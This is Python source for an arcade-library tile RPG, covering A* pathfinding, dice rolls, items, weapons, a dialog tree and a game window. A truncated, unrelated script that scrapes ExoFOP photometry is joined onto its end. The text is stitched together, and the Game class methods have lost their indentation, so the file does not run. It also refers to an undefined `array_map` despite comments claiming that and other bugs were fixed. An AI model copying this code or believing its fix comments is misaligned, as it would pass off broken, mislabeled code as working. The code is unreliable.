tile_set = arcade.draw_commands.load_textures('./Images/64x64Tile.png', loc_array['Tile'])
# gid 0 means "empty"; pad index 0 so gid values index tile_set directly.
tile_set.insert(0, tile_set[-1])
font = arcade.draw_commands.load_textures('./Images/64x64Font.png', loc_array['Font'])
# Load each .tmx into both flat-tuple and per-layer 2D array representations.
for map_name in map_dir:
    map_file = tmx.TileMap.load('./Maps/{}'.format(map_name))
    list_maps[map_name.split('.')[0]] = list(zip(*[[tile.gid for tile in layer.tiles] for layer in map_file.layers_list]))
    array_maps[map_name.split('.')[0]] = [np.array([tile.gid for tile in layer.tiles]).reshape(map_file.height, map_file.width) for layer in map_file.layers_list]
def astar(start, goal, array=None):
    """A* pathfinding on a 2D grid; cells equal to 1 are walls.

    Returns the path as a list of (row, col) tuples ordered from `goal`
    back to (but excluding) `start`, or False when no path exists.
    `array` defaults to the current map's first layer, resolved lazily —
    the original default was evaluated at import time and referenced the
    misspelled name `array_map` (the module defines `array_maps`).
    """
    if array is None:
        array = array_maps[current_map][0]

    def heuristic(a, b):
        # Squared Euclidean distance; equals 1 for the 4-way unit moves below.
        return (b[0] - a[0]) ** 2 + (b[1] - a[1]) ** 2

    neighbors = [(0, 1), (0, -1), (1, 0), (-1, 0)]  # 4-way movement only
    close_set = set()
    came_from = {}
    gscore = {start: 0}
    fscore = {start: heuristic(start, goal)}
    oheap = []
    heapq.heappush(oheap, (fscore[start], start))
    while oheap:
        current = heapq.heappop(oheap)[1]
        if current == goal:
            # Walk the parent chain back toward the start.
            data = []
            while current in came_from:
                data.append(current)
                current = came_from[current]
            return data
        close_set.add(current)
        for d_row, d_col in neighbors:
            neighbor = current[0] + d_row, current[1] + d_col
            # Skip out-of-bounds cells and walls (value 1).
            if not (0 <= neighbor[0] < array.shape[0] and 0 <= neighbor[1] < array.shape[1]):
                continue
            if array[neighbor[0]][neighbor[1]] == 1:
                continue
            tentative_g_score = gscore[current] + heuristic(current, neighbor)
            # Unseen nodes must compare as infinitely far, not 0 (the
            # original default of 0 made these comparisons vacuous).
            if neighbor in close_set and tentative_g_score >= gscore.get(neighbor, float('inf')):
                continue
            if tentative_g_score < gscore.get(neighbor, float('inf')) or neighbor not in [entry[1] for entry in oheap]:
                came_from[neighbor] = current
                gscore[neighbor] = tentative_g_score
                fscore[neighbor] = tentative_g_score + heuristic(neighbor, goal)
                heapq.heappush(oheap, (fscore[neighbor], neighbor))
    return False
def roll_dice(s='1d'):
    """Roll dice described in 'NdS' or 'NdSdL' notation.

    'NdS'   -> sum of N rolls of an S-sided die (each roll in 1..S).
    'NdSdL' -> same, but the L lowest rolls are dropped first.
    The degenerate default '1d' returns 0 (as the original always did).
    """
    if s == '1d':
        return 0  # original returned np.random.randint(0, 1), which is always 0
    spec = [int(part) for part in s.split('d')]
    count, sides = spec[0], spec[1]
    drop = spec[2] if len(spec) > 2 else 0
    # randint's upper bound is exclusive: use sides + 1 so an S-sided die
    # can actually roll S (the original rolled only 1..S-1).
    rolls = sorted(np.random.randint(1, sides + 1, count))
    return int(sum(rolls[drop:]))
class Entity:
    """Base game object: a (y, x) grid position, a name and a sprite index."""

    def __init__(self, yx=(0, 0), name=None, sprite=-1):
        self.y, self.x = yx
        self.name = name
        self.sprite = sprite

    @staticmethod
    def name_list(in_list):
        """Return the .name of every element of in_list.

        Raises TypeError with a descriptive message when an element has no
        name attribute. (The original raised a bare string, which is itself
        a TypeError in Python 3 with an unhelpful message.)
        """
        try:
            return [list_element.name for list_element in in_list]
        except AttributeError:
            raise TypeError('{} does not have a name attribute'.format(in_list))
class Actor(Entity):
    """An Entity with simple AI: pathfinds toward a target until it is
    within target_distance (Manhattan), then tries to step aside."""
    def __init__(self, yx, name, sprite, disposition, target_distance):
        Entity.__init__(self, yx, name, sprite)
        self.disposition = disposition  # e.g. 'Friendly' / 'Aggressive'
        self.target_distance = target_distance  # Manhattan range at which to stop chasing
    def move_me(self, goal):
        # Advance one tile along the A* path toward goal = (y, x).
        # NOTE(review): this references `array_map`, but the module defines
        # `array_maps` — confirm which name is intended.
        if (abs(self.y-goal[0]) + abs(self.x-goal[1])) > self.target_distance: # i only want to calculate the path tree if need be
            path = astar((self.y, self.x), goal, array_map[current_map][0])
            if path:
                # astar returns the path goal-first, so the last entry is
                # the next step from our current tile.
                self.y, self.x = path[-1]
        elif self.y == goal[0] and self.x == goal[1]: # lazy implementation of moving AI out of the way, needs to be rewritten for different dispositions
            # NOTE(review): truthy cell => step there; successive ifs can
            # move more than once per call — looks unintended, confirm.
            if array_map[current_map][0][self.y + 1, self.x]:
                self.y, self.x = self.y + 1, self.x
            if array_map[current_map][0][self.y - 1, self.x]:
                self.y, self.x = self.y - 1, self.x
            if array_map[current_map][0][self.y, self.x + 1]:
                self.y, self.x = self.y, self.x + 1
            else:
                self.y, self.x = self.y, self.x - 1
class Item(Entity):
    """A carryable item with a cost, a weight and optional flavor text."""

    def __init__(self, name, cost, weight, sprite, flavor_text=None):
        Entity.__init__(self, name=name, sprite=sprite)
        self.cost = cost
        self.weight = weight
        self.flavor_text = flavor_text
        self.actions = ['Look', 'Drop']

    def look(self):
        """Present the flavor text as dialog spoken by the item itself."""
        return DialogItem(text=self.flavor_text, speaker=self.name)

    def get_actions(self):
        """Action labels padded with surrounding spaces for menu rendering."""
        return [' {} '.format(label) for label in self.actions]
class EquipmentItem(Item):
    """An Item that can additionally be equipped."""

    def __init__(self, name, cost, weight, sprite):
        Item.__init__(self, name=name, cost=cost, weight=weight, sprite=sprite)
        # Equipable items gain the extra menu action.
        self.actions += ['Equip']
class Armor(EquipmentItem):
    """Chest-slot armor carrying AC bonus, speed and armor-check data."""

    def __init__(self, name, cost, weight, speed, asfc, armor_type, bonus, acp, max_bonus, sprite):
        EquipmentItem.__init__(self, name, cost, weight, sprite)
        self.armor_type = armor_type  # (the original assigned this twice; once suffices)
        self.speed = speed
        self.asfc = asfc
        self.bonus = bonus
        self.acp = acp
        self.cost = cost
        self.max_bonus = max_bonus
        self.body_position = ['Chest']

    def __repr__(self):
        return ' {} (+{})'.format(self.name, self.bonus)

    def look(self):
        """Summarize type, spell-failure chance and bonus as dialog."""
        return DialogItem(text='{} {} {}'.format(self.armor_type, self.asfc, self.bonus), speaker=self.name)
class Weapon(EquipmentItem):
    """A wieldable weapon; its sprite derives from material quality and id."""

    def __init__(self, name, dmg, dmg_style, weight, weapon_type, cost, handed, crit_mult, dmg_range, weap_id, q=0):
        self.weap_id = weap_id
        # Material quality: 0 Wood, 1 Bronze, 2 Iron, 3 Steel, 4 Green, 5 Blue, 6 Albanium.
        self.q = q
        # Each quality tier occupies a 57-sprite stride starting at index 2052;
        # computed before the base __init__ so it can serve as the sprite.
        self.texture = self.q * 57 + 2052 + weap_id
        EquipmentItem.__init__(self, name, cost, weight, self.texture)
        self.dmg = dmg
        self.dmg_style = dmg_style
        self.weapon_type = weapon_type
        self.handed = handed
        self.crit_mult = crit_mult
        self.dmg_range = dmg_range
        self.body_position = ['Left Hand', 'Right Hand']

    def __repr__(self):
        return ' {} ({})'.format(self.name, self.dmg)

    def look(self):
        """Summarize the combat stats as a DialogItem spoken by the weapon."""
        return DialogItem(text='({} - {}) {} {}-Handed, crit:{}'.format(self.dmg, self.dmg_style, self.weapon_type, 'Two'*bool(self.handed-1) or 'One', self.crit_mult), speaker=self.name)
class Gold:
    """A money amount split into gold (units of 64) and silver remainder,
    with the pile-size sprite index for each."""

    def __init__(self, cost):
        gold, silver = divmod(cost, 64)
        self.cost = (gold, silver)
        # Silver pile sprite: small below 8, large otherwise.
        silver_tex = 614 if silver < 8 else 671
        # Gold pile sprite grows with the amount.
        if gold < 8:
            gold_tex = 615
        elif gold < 64:
            gold_tex = 672
        elif gold < 256:
            gold_tex = 668
        elif gold < 512:
            gold_tex = 669
        else:
            gold_tex = 670
        self.texture = [gold_tex, silver_tex]

    def __repr__(self):
        return '{}g {}s'.format(*self.cost)
class DialogItem(Entity):
    """A dialog node: optional word-wrapped text, a speaker name and
    optional reply options (mapping label -> next DialogItem)."""
    def __init__(self, text=None, speaker=None, dialog_opts=None, yx=(0, 0), on_level=None, sprite=-1):
        Entity.__init__(self, yx=yx, sprite=sprite)
        self.speaker = speaker
        if type(text) is str:
            # Greedy word-wrap: char_width holds pixel widths; divided by 8
            # they become the 1/8-tile units compared against the 116-unit
            # dialog-box width.
            working_text = text.split()
            len_line = 0
            out_lines = []
            line_data = 0   # index of the first word of the current line
            counter = 0
            while counter < len(working_text) - 1:
                for char in working_text[counter]:
                    len_line += char_width[char] // 8
                len_line += 3 # spaces!
                if len_line > 116: # width of the dialog box
                    # Overflow: flush the words before this one, then start
                    # the next line at the overflowing word (it is rescanned
                    # because counter is stepped back before the increment).
                    out_lines.append(' '.join(working_text[line_data:counter]))
                    counter -= 1
                    len_line = 0
                    line_data = counter + 1
                counter += 1
            # Remaining words (including the last) form the final line.
            out_lines.append(' '.join(working_text[line_data:]))
            self.text = out_lines
        else:
            # Non-string text (e.g. an already-wrapped list or None) is kept as-is.
            self.text = text
        self.dialog_opts = dialog_opts
    def new_opt(self, newopt):
        # Placeholder for adding a dialog option at runtime.
        pass
    def __repr__(self):
        return 'Speaker: {}\nText: {}\nDialog Options: \n{}\n'.format(self.speaker, self.text, self.dialog_opts)
class Player(Entity):
    """The player character: rolled ability scores, gold, inventory and
    equipment slots."""

    def __init__(self):
        # NOTE: `name` is the Player class object itself in the original; preserved.
        Entity.__init__(self, yx=(71, 26), name=Player, sprite=1768)
        self.gold = Gold(100)
        # Abilities use 4d6-drop-lowest; HP/FP/XP start at fixed values.
        self.stats = {ability: roll_dice('4d6d1')
                      for ability in ('Str', 'Dex', 'Int', 'Wil', 'Per')}
        self.stats['HP'] = 8
        self.stats['FP'] = 0
        self.stats['XP'] = 0
        self.inventory = []
        self.equipped = {'Floating Left': None, 'Left Arm': None, 'Left Weapon': None, 'Left Ring One': None, 'Left Ring Two': None,
                         'Helmet': None, 'Shoulders': None, 'Chest': None, 'Gloves': None, 'Boots': None,
                         'Floating Right': None, 'Right Arm': None, 'Right Weapon': None, 'Right Ring One': None, 'Right Ring Two': None}
        self.state = 'Walking'

    @staticmethod
    def get_bag(bag):
        """Names of every item in the given container."""
        return [thing.name for thing in bag]

    def equip_stats(self):
        """Each equipment slot name wrapped in its own single-item list."""
        return [[str(slot)] for slot in self.equipped]

    def get_stats(self):
        """Ability scores rendered as zero-padded 'Key:NN' tokens."""
        return 'Str:{Str:02d} Dex:{Dex:02d} Int:{Int:02d} Wil:{Wil:02d} Per:{Per:02d}'.format(**self.stats).split()

    def get_points(self):
        """Zero-padded HP and FP values."""
        return '{HP:02d} {FP:02d}'.format(**self.stats).split()
# Sample dialog graph used for testing: two leaf dialogs (test_dia,
# other_test), one single-level choice (BrokenDoor) and one two-level
# choice (BrDo2) whose every option leads to BrokenDoor.
test_dia = DialogItem(sprite=34, text='''
At last I have the privilege of making public this third book of Marx's main work,
the conclusion of the theoretical part. When I published the second volume, in 1885,
I thought that except for a few, certainly very important, sections the third
volume would probably offer only technical difficulties. This was indeed the case.
But I had no idea at the time that these sections, the most important parts of the
entire work, would give me as much trouble as they did, just as I did not anticipate
the other obstacles, which were to retard completion of the work to such an extent.''',
                      speaker='Engels', yx=(73, 26), on_level='overworld')
other_test = DialogItem(sprite=456, text="got this far", speaker='Marie', yx=(73, 26), on_level='overworld')
BrokenDoor = DialogItem(sprite=345, text='Who is it?', dialog_opts={"Me": test_dia, "You": other_test}, speaker='Dick Allcocks from Man Island', yx=(73, 27), on_level='overworld')
BrDo2 = DialogItem(sprite=33,
                   dialog_opts={"What this?": BrokenDoor, "Why that?": BrokenDoor, "Who there?": BrokenDoor, "When it?": BrokenDoor},
                   speaker='Thine Momther', yx=(73, 27), on_level='overworld')
class Game(arcade.Window):
def __init__(self, width, height):
super().__init__(width, height)
self.last_input_time = 0
self.cur_time = 0
self.draw_time = 0
self.processing_time = 0
self.pressed_keys = self.pressed_keys
self.cur_opt = [0, 0]
self.opt_highlighted = False
self.inventory_screen = 0
self.cur_item = None
self.cur_text = None
self.p = Player()
self.switch_state(new_state='Walking', new_map=current_map)
self.actor1 = Actor(yx=(61, 26), name='Goast', sprite=909, disposition='Friendly', target_distance=1)
self.actor2 = Actor(yx=(71, 26), name='Victor', sprite=1781, disposition='Aggressive', target_distance=6)
self.actor_list = [self.actor1, self.actor2, BrDo2, test_dia]
self.p.inventory = []
self.game_step()
self.cur_health = [icon for sublist in [[1746] * (self.p.stats['HP'] // 2), [1747] * (self.p.stats['HP'] % 2 == 1)] for icon in sublist]
self.p.equipped = {'Floating Left': None, 'Left Arm': None, 'Left Weapon': None, 'Left Ring One': None, 'Left Ring Two': None,
'Helmet': None, 'Shoulders': None, 'Chest': None, 'Gloves': None, 'Boots': None,
'Floating Right': None, 'Right Arm': None, 'Right Weapon': None, 'Right Ring One': None, 'Right Ring Two': None}
def draw_base(self):
"""draw the main level, including the four key layers: Background : 1, Midground : 2, Sprites, and Foreground : 3, in that order."""
arcade.start_render()
for row in range(ROWS):
tile_width = WIDTH * row + 32
for col in range(COLS):
cur_tile = f_maps[current_map][(row + self.p.y - 4) * 16 + (col + self.p.x - 8)]
tile_height = HEIGHT * col + 32
for tile_layer in cur_tile:
if tile_layer:
arcade.draw_texture_rectangle(tile_height, tile_width, WIDTH, HEIGHT, tile_set[tile_layer])
def add_sprites(self):
np.copyto(array_map[current_map]['Sprite'], array_map[current_map]['Sprite Copy'])
for actor in self.actor_list:
array_map[current_map]['Sprite'][actor.y, actor.x] = actor
array_map[current_map]['Sprite'][self.p.y, self.p.x] = self.p
def on_draw(self):
draw_start_time = timeit.default_timer()
self.draw_base()
if self.p.state is 'Talking':
for row in range(ROWS):
for col in range(COLS):
self.gen_tile_array(array_map['dialog'], r_c=(row, col), yx=(0, 0.5))
self.gen_text(text=self.cur_text.text, speaker=self.cur_text.speaker, opts=self.cur_text.dialog_opts)
if self.p.state is 'Inventory':
for row in range(ROWS):
for col in range(COLS):
self.gen_tile_array(array_map['inventory'][self.inventory_screen], r_c=(row, col))
self.gen_inv()
if self.p.state is 'Walking':
for col in range(-(-self.p.stats['HP'] // 2)): # weird ass way of getting how many heart containers to draw
self.gen_lone_tile(self.cur_health[col], (0.5 + col, 8.5))
fps = 1 / (self.draw_time + self.processing_time)
if fps < 20:
cur_color = arcade.color.RED
elif fps < 60:
cur_color = arcade.color.WHITE
else:
cur_color = arcade.color.GREEN
arcade.draw_text('FPS: {}'.format(int(fps)), 20, SCREEN_HEIGHT - 80, cur_color, 16)
self.draw_time = timeit.default_timer() - draw_start_time
def switch_state(self, new_state, new_map=None):
self.cur_opt = [0, 0]
self.opt_highlighted = False
if new_state is 'Talking':
if self.cur_text.speaker:
array_map['dialog'][3] = [cur_tile for cur_row in [[0], [1564], [1565] * ((len(self.cur_text.speaker)) // 2 + 1), [1566], [0] * 15] for cur_tile in cur_row][:16]
else:
array_map['dialog'][3] = [0] * 16
if new_state is 'Walking':
pass
if new_state is 'Inventory':
self.inventory_screen = 0
self.p.state = new_state
if new_map:
array_map[new_map]['Sprite'] = np.zeros(shape=array_map[new_map][1].shape, dtype=Entity)
array_map[new_map]['Sprite Copy'] = array_map[new_map]['Sprite'][:]
def cursor(self, list_locs, yx):
y, x = yx
try:
list_locs[self.cur_opt[0]]
except IndexError:
self.cur_opt = [0, 0]
arcade.draw_texture_rectangle(x * WIDTH - 32, (y - list_locs[self.cur_opt[0]]) * HEIGHT, WIDTH, HEIGHT, tile_set[1481])
def gen_text(self, text=None, speaker=None, opts=None, yx=(2.25, 1), len_display=3):
y, x = yx
if speaker:
width_sum = 0
for char_pos, char in enumerate(speaker):
width_sum += char_width[speaker[char_pos-1]]
arcade.draw_texture_rectangle(width_sum+40, 216, WIDTH, HEIGHT, font[ord(char)])
if opts:
if type(opts) is not list:
opt_names = list(opts.keys())
else:
opt_names = opts
if text:
cursor_locs = np.arange(len(text), len(text) + len(opt_names))
else:
cursor_locs = np.arange(0, len(opt_names))
for item_pos, item in enumerate(opt_names[self.cur_opt[1]:self.cur_opt[1] + len_display]):
width_sum = 0
for char_pos, char in enumerate(item):
width_sum += char_width[item[char_pos - 1]]
arcade.draw_texture_rectangle(width_sum + x * WIDTH, (y - item_pos - int(text is not None)) * HEIGHT, WIDTH, HEIGHT, font[ord(char)])
self.cursor(cursor_locs, yx)
if text:
for line_pos, line in enumerate(text[self.cur_opt[1]:self.cur_opt[1]+len_display]):
width_sum = 0
for char_pos, char in enumerate(text[line_pos + self.cur_opt[1]]):
width_sum += char_width[text[line_pos + self.cur_opt[1]][char_pos - 1]]
arcade.draw_texture_rectangle(width_sum + (x * WIDTH), ((y - line_pos) * HEIGHT), WIDTH, HEIGHT, font[ord(char)])
def gen_inv(self):
    """Render the inventory UI for the currently selected tab (0..3)."""
    for icon in range(4):
        self.gen_lone_tile(icon+1821, (2.5 + icon * 2, 8))  # icons for menu tabs
    if self.inventory_screen == 0:
        # Tab 0: carried items (sprite column plus name list).
        # NOTE(review): `self.cur_opt[1] + 6 or -1` always evaluates to
        # cur_opt[1] + 6 (the `or -1` is dead) — confirm intent.
        for cur_item in range(len(self.p.inventory[self.cur_opt[1]:self.cur_opt[1] + 6 or -1])):
            self.gen_lone_tile(self.p.inventory[cur_item + self.cur_opt[1]].sprite, yx=(2, 6.5 - cur_item))
        if not self.opt_highlighted:
            self.gen_text(opts=[' {}'.format(cur_item) for cur_item in self.p.name_list(self.p.inventory)], yx=(6.5, 1.5), len_display=6)
        else:
            # An item is highlighted: names become plain text, sub-menu opens.
            self.gen_text(text=[' {}'.format(cur_item) for cur_item in self.p.name_list(self.p.inventory)], yx=(6.5, 1.5), len_display=6)
            self.gen_sub_menu()  # this is disgusting
    elif self.inventory_screen == 1:
        # Tab 1: equipped items, laid out on a grid of body slots.
        for item_pos, cur_item in enumerate(list(self.p.equipped.keys())):
            if self.p.equipped[cur_item] is not None:
                self.gen_lone_tile(self.p.equipped[cur_item].sprite, yx=(2 + item_pos // 5, 6 - item_pos % 5))
        if not self.opt_highlighted:
            # Slot-selection cursor tile plus the selected item's name.
            self.gen_lone_tile(1906, yx=(2 + self.cur_opt[0] // 5, 6 - self.cur_opt[0] % 5))
            if self.p.equipped[list(self.p.equipped.keys())[self.cur_opt[0]]] is not None:
                self.gen_text(text=[self.p.equipped[list(self.p.equipped.keys())[self.cur_opt[0]]].name], yx=(6.5, 5.5))
        else:
            self.gen_text(text=self.p.equipped[list(self.p.equipped.keys())[self.cur_opt[0]]].actions, yx=(6.5, 1.5), len_display=6)
            self.gen_sub_menu()
    elif self.inventory_screen == 2:
        # Tab 2: player statistics, read-only.
        self.gen_text(text=self.p.get_stats(), yx=(6.5, 1), len_display=6)
    elif self.inventory_screen == 3:
        # Tab 3: options menu.
        self.gen_text(opts=options_menu, yx=(6.5, 2))
def gen_sub_menu(self):
    """Draw the item context sub-menu panel and the current item's actions."""
    '''for cur_pos, cur_tile in enumerate(f_maps['submenu']):
    self.gen_lone_tile(cur_tile, (10 + cur_pos % 4, 2.5 + cur_pos // 4))'''
    for x, row in enumerate(array_map['submenu']):
        for y, col in enumerate(row):
            # NOTE(review): `col` is unused — gen_tile_array re-indexes the
            # array with the (x, y) pair itself.
            self.gen_tile_array(array_map['submenu'], (x, y), yx=(10, 2.5))
    self.gen_text(opts=self.cur_item.get_actions(), yx=(6, 11))
@staticmethod
def gen_tile_array(in_array, r_c, yx=(0, 0)):
    """Blit the tile stored at grid cell *r_c* of *in_array*, offset by *yx*."""
    (row, col), (y, x) = r_c, yx
    tile_id = in_array[r_c]
    screen_x = HEIGHT * (y + col)
    screen_y = WIDTH * (x + row)
    arcade.draw_texture_rectangle(screen_x, screen_y, WIDTH, HEIGHT, tile_set[tile_id])
@staticmethod
def gen_lone_tile(in_tile, yx, base_img=None):
    """Draw a single tile *in_tile* at tile-space position *yx*.

    base_img: texture container to index; defaults to the global tile_set.
    """
    # BUG FIX: the original tested `if not base_img`, which would also
    # replace a falsy-but-valid container (e.g. an empty sequence) with
    # tile_set. Compare against None explicitly.
    if base_img is None:
        base_img = tile_set
    y, x = yx
    arcade.draw_texture_rectangle(HEIGHT * y, WIDTH * x, WIDTH, HEIGHT, base_img[in_tile])
def on_key_press(self, key, modifiers):
    """Route a key press according to the player's current UI state.

    BUG FIX: every state/string comparison used `is`/`is not` on str
    literals, which only works because of CPython string interning;
    replaced with `==`/`!=` throughout.
    """
    if self.p.state == 'Inventory':
        # NW/NE cycle between the four inventory tabs.
        if key in movement_keys['NW'] and self.inventory_screen > 0:
            self.cur_opt = [0, 0]
            self.inventory_screen -= 1
        if key in movement_keys['NE'] and self.inventory_screen < 3:
            self.cur_opt = [0, 0]
            self.inventory_screen += 1
        if key in movement_keys['Inv']:
            if self.opt_highlighted:
                self.opt_highlighted = False
            else:
                self.switch_state('Walking')
        if self.inventory_screen == 0:  # carried-items tab
            if key in movement_keys['S']:
                if self.opt_highlighted:
                    self.cur_opt[0] += 1
                else:
                    if self.cur_opt[0] < 5:
                        self.cur_opt[0] += 1
                    elif sum(self.cur_opt) + 1 < len(self.p.inventory):
                        self.cur_opt[1] += 1  # scroll the list window
            if key in movement_keys['N']:
                if self.cur_opt[0] > 0:
                    self.cur_opt[0] -= 1
                elif self.cur_opt[1] > 0:
                    self.cur_opt[1] -= 1
            if key in movement_keys['Context']:
                if self.opt_highlighted:
                    self.interact_item(self.cur_item, self.cur_item.actions[self.cur_opt[0]])
                    self.opt_highlighted = False
                else:
                    self.cur_item = self.p.inventory[sum(self.cur_opt)]
                    self.opt_highlighted = True
        if self.inventory_screen == 1:  # equipped-items tab (grid of slots)
            if key in movement_keys['S'] and self.cur_opt[0] < 14:
                self.cur_opt[0] += 1
            if key in movement_keys['N'] and self.cur_opt[0] > 0:
                self.cur_opt[0] -= 1
            if key in movement_keys['E'] and self.cur_opt[0] < 10:
                self.cur_opt[0] += 5
            if key in movement_keys['W'] and self.cur_opt[0] > 4:
                self.cur_opt[0] -= 5
            if key in movement_keys['Context']:
                if self.opt_highlighted:
                    self.interact_item(self.cur_item, self.cur_item.actions[self.cur_opt[0]])
                    self.opt_highlighted = False
                else:
                    # NOTE(review): stores the item's *name* while tab 0 stores
                    # the item object — confirm interact_item handles both.
                    self.cur_item = self.p.equipped[list(self.p.equipped.keys())[self.cur_opt[0]]].name
                    self.opt_highlighted = True
        if self.inventory_screen == 2:  # stats tab: read-only
            pass
        if self.inventory_screen == 3:  # options tab
            if key in movement_keys['Context']:
                # All three entries currently just close the game window.
                if 'Settings' in options_menu[self.cur_opt[0]]:
                    Game.close(self)
                if 'Gameplay' in options_menu[self.cur_opt[0]]:
                    Game.close(self)
                if 'Exit' in options_menu[self.cur_opt[0]]:
                    Game.close(self)
            if key in movement_keys['S'] and self.cur_opt[0] < 3:
                self.cur_opt[0] += 1
            if key in movement_keys['N'] and self.cur_opt[0] > 0:
                self.cur_opt[0] -= 1
    elif self.p.state == 'Walking':
        if key in movement_keys['Inv']:
            self.switch_state('Inventory')
        if key in movement_keys['Context']:
            # Talk to a dialog entity in the tile the player faces (y+1).
            if type(array_map[current_map]['Sprite'][self.p.y + 1, self.p.x]) is DialogItem:
                self.cur_text = array_map[current_map]['Sprite'][self.p.y + 1, self.p.x]
                self.switch_state('Talking')
    elif self.p.state == 'Talking':
        if key in movement_keys['N']:
            if self.cur_opt[0] > 0:
                self.cur_opt[0] -= 1
            elif self.cur_opt[1] > 0:
                self.cur_opt[1] -= 1
        if key in movement_keys['S']:
            if self.cur_opt[0] < 2:
                self.cur_opt[0] += 1
            elif sum(self.cur_opt) < len(self.cur_text.dialog_opts) - 1:
                self.cur_opt[1] += 1
        if key in movement_keys['Context']:
            if self.cur_text.dialog_opts:
                # Replace the dialog entity with the chosen follow-up.
                array_map[current_map]['Sprite'][self.p.y + 1, self.p.x] = self.cur_text.dialog_opts[list(self.cur_text.dialog_opts)[sum(self.cur_opt)]]
                self.whatsnextifier(choice=self.cur_text.dialog_opts[list(self.cur_text.dialog_opts)[sum(self.cur_opt)]])
                self.switch_state('Talking')
                print(array_map[current_map]['Sprite'][self.p.y + 1, self.p.x])
            elif len(self.cur_text.text) > 3:
                # NOTE(review): nesting reconstructed — the trailing else is
                # read as "nothing left to scroll -> leave Talking"; confirm.
                if len(self.cur_text.text) - 2 > self.cur_opt[1]:
                    self.cur_opt[1] += 1
                else:
                    self.switch_state('Walking')
    if key in movement_keys['Exit']:
        if self.p.state == 'Inventory' and self.opt_highlighted:
            self.opt_highlighted = False
        elif self.p.state != 'Walking':
            self.switch_state('Walking')
        else:
            # From the overworld, Exit opens the options tab directly.
            self.switch_state('Inventory')
            self.inventory_screen = 3
def on_mouse_press(self, x: float, y: float, dx: float, dy: float):
    """Debug handler: log the screen coordinates of a mouse click."""
    print(x, y)
def update(self, delta_time: float):
    """Per-frame tick: apply held movement keys (throttled) while walking.

    BUG FIXES: the state comparison used `is 'Walking'` (identity on a str
    literal) — now `==`; the NW and SE diagonal collision guards tested the
    opposite diagonal cell — now they test the actual destination cell.
    """
    start_time = timeit.default_timer()
    if self.p.state == 'Walking' and self.pressed_keys:
        self.cur_time = time.process_time()
        # Throttle movement to one step per 50 ms while keys are held.
        if self.cur_time - self.last_input_time > 0.05:
            # NOTE(review): cardinal moves have their collision checks
            # commented out (kept below), while diagonal moves check —
            # confirm this asymmetry is intentional.
            if any(key in movement_keys['N'] for key in self.pressed_keys):
                # if array_map[current_map][0][self.p.y + 1, self.p.x] == 0:
                self.p.y += 1
                self.game_step()
            if any(key in movement_keys['S'] for key in self.pressed_keys):
                # if array_map[current_map][0][self.p.y - 1, self.p.x] == 0:
                self.p.y -= 1
                self.game_step()
            if any(key in movement_keys['E'] for key in self.pressed_keys):
                # if array_map[current_map][0][self.p.y, self.p.x + 1] == 0:
                self.p.x += 1
                self.game_step()
            if any(key in movement_keys['W'] for key in self.pressed_keys):
                # if array_map[current_map][0][self.p.y, self.p.x - 1] == 0:
                self.p.x -= 1
                self.game_step()
            if any(key in movement_keys['NE'] for key in self.pressed_keys):
                if array_map[current_map][0][self.p.y + 1, self.p.x + 1] == 0:
                    self.p.x += 1
                    self.p.y += 1
                    self.game_step()
            if any(key in movement_keys['NW'] for key in self.pressed_keys):
                # BUG FIX: guard previously tested [y - 1, x + 1] (the SE
                # cell) although the move goes to [y + 1, x - 1].
                if array_map[current_map][0][self.p.y + 1, self.p.x - 1] == 0:
                    self.p.x -= 1
                    self.p.y += 1
                    self.game_step()
            if any(key in movement_keys['SE'] for key in self.pressed_keys):
                # BUG FIX: guard previously tested [y + 1, x - 1] (the NW
                # cell) although the move goes to [y - 1, x + 1].
                if array_map[current_map][0][self.p.y - 1, self.p.x + 1] == 0:
                    self.p.x += 1
                    self.p.y -= 1
                    self.game_step()
            if any(key in movement_keys['SW'] for key in self.pressed_keys):
                if array_map[current_map][0][self.p.y - 1, self.p.x - 1] == 0:
                    self.p.x -= 1
                    self.p.y -= 1
                    self.game_step()
            self.last_input_time = self.cur_time
    self.processing_time = timeit.default_timer() - start_time
def interact_item(self, item, action):
    """Apply *action* ('Equip', 'Look' or 'Drop') to *item*.

    BUG FIXES: `is` string comparisons replaced with `==`; equipping now
    stops at the first free body slot (the original filled every free slot
    with the same item) and restores the item to the inventory when no
    slot is free (the original silently lost it).
    """
    if action == 'Equip':
        if item in self.p.inventory:
            self.p.inventory.remove(item)
            for possible_pos in item.body_position:
                if self.p.equipped[possible_pos] is None:
                    self.p.equipped[possible_pos] = item
                    break  # occupy exactly one slot
            else:
                # No free slot: put the item back instead of losing it.
                self.p.inventory.append(item)
        else:  # the item is equipped: toggle it back into the inventory
            # NOTE(review): the equipped slot is not cleared here — confirm
            # un-equipping is completed elsewhere.
            self.p.inventory.append(item)
    if action == 'Look':
        self.cur_text = item.look()
        self.switch_state('Talking')
    if action == 'Drop':
        self.p.inventory.remove(item)
def whatsnextifier(self, choice):
    """Install *choice* as the dialog entity in the tile the player faces
    and make it the current dialog."""
    sprite_layer = array_map[current_map]['Sprite']
    facing_cell = (self.p.y + 1, self.p.x)
    sprite_layer[facing_cell] = choice
    self.cur_text = sprite_layer[facing_cell]
def game_step(self):
    """Advance the world one step: refresh sprites and move every actor.

    BUG FIX: actor disposition comparisons used `is` on str literals;
    replaced with `==`.
    """
    self.add_sprites()
    # Health-bar tiles: full hearts for each 2 HP plus a half heart for odd HP.
    # NOTE(review): cur_health is computed but not used in this method —
    # confirm whether it should be stored or drawn here.
    cur_health = [item for sublist in [[1745] * (self.p.stats['HP'] // 2), [1746] * (self.p.stats['HP'] % 2 == 1)] for item in sublist]
    actor_list = [cur_act for cur_act in self.actor_list if hasattr(cur_act, 'disposition')]
    enemy_list = [enemy for enemy in actor_list if enemy.disposition == 'Aggressive']
    for actor in actor_list:
        if actor.disposition == 'Friendly':
            # Friendlies chase the first enemy if one exists, else follow the player.
            if enemy_list:
                actor.move_me((enemy_list[0].y, enemy_list[0].x))
            else:
                actor.move_me((self.p.y, self.p.x))
        elif actor.disposition == 'Aggressive':
            actor.move_me((self.p.y, self.p.x))
def main():
    """Instantiate the game window and hand control to arcade's event loop."""
    Game(*sc)
    arcade.run()


if __name__ == '__main__':
    main()
|
18,758 | 4d671e45c6541d17b178dd7dc21bc857b005f62c | # coding: utf-8
import sys
try:
# python 3
from urllib.request import urlopen, urlretrieve
except ImportError:
# Python 2
from urllib import urlretrieve
from urllib2 import urlopen
from bs4 import BeautifulSoup
from tqdm import tqdm
import os
def get_phot(epic, verbose=False, savefp=None, return_str=False):
    """Scrape broadband photometry for an EPIC target from ExoFOP.

    Returns a dict mapping band name to a float (no error quoted) or a
    [value, error] list; optionally saves/prints/returns the formatted text.
    """
    PM = '±'
